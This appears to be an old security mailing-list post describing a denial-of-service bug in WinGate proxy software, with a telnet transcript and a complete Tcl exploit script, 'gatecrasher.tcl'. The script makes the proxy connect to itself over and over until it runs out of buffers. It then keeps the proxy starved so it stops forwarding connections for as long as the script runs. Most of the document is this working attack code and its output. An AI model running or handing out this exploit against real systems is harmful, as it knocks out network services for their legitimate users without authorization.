$ telnet unsecured.wingate.com
Trying XXX.XX.XX.XXX...
Connected to XXX.XX.XX.XXX.
Escape character is '^]'.
WinGate>localhost
Connecting to host localhost...Connected
As you can see, the WinGate happily connects to itself. Do this enough
times, and ...
WinGate>localhost
Connecting to host localhost...Out of buffers
At this point, the WinGate stops forwarding connections. Clients can
still connect but cannot make use of it.
Below is a simple TCL exploit to demonstrate the idea.
- Matt
#!/usr/local/bin/tclsh
# gatecrasher.tcl
#
# This opens a WinGate and connects it to itself repeatedly until the
# target machine runs out of buffers and stops forwarding connections.
# The WinGate will not function as long as the script is running.
#
# Credit goes to Chris Snell <texan@hooked.net> for finding the bug.
#
# I apologize in advance for not being cool enough to script this is perl.
#
# - Matt Carothers <carother@ou.edu>
set host [lindex $argv 0];
set port [lindex $argv 1];
if {![string compare $host ""]} {
set command [string range $argv0 [expr [string last / $argv0] + 1] end];
puts stdout "Usage: $command <host> \[port\]";
exit 1;
}
if {![string compare $port ""]} {
set port 23;
}
if {[catch {set sock [socket $host $port]} stuff]} {
# Could not connect for some reason. Output an error message and exit.
puts stdout "$host:$port : $stuff";
exit 1;
}
puts stdout "Connected to $host:$port. Launching WinGate kill ...";
set flag 0;
puts $sock "localhost";
flush $sock;
while {[gets $sock line] >= 0} {
if {[string match "*Connected*" $line]} {
# We've successfully connected the WinGate to itself.
# Whee, let's do it again.
puts $sock "localhost";
flush $sock;
puts -nonewline stdout ".";
flush stdout;
set flag 0;
} elseif {[string match "*Out of buffers*" $line]} {
# The WinGate is now out of buffers.
# We'll output a message to that effect and keep trying. This
# serves as a keep-alive and lets us jump in and fill any buffers
# freed by clients which disconnect after the attack succeeds.
if {!$flag} {
puts stdout "\n*plink*";
set flag 1;
}
puts $sock "localhost";
flush $sock;
}
}
puts stdout "\nConnection lost.";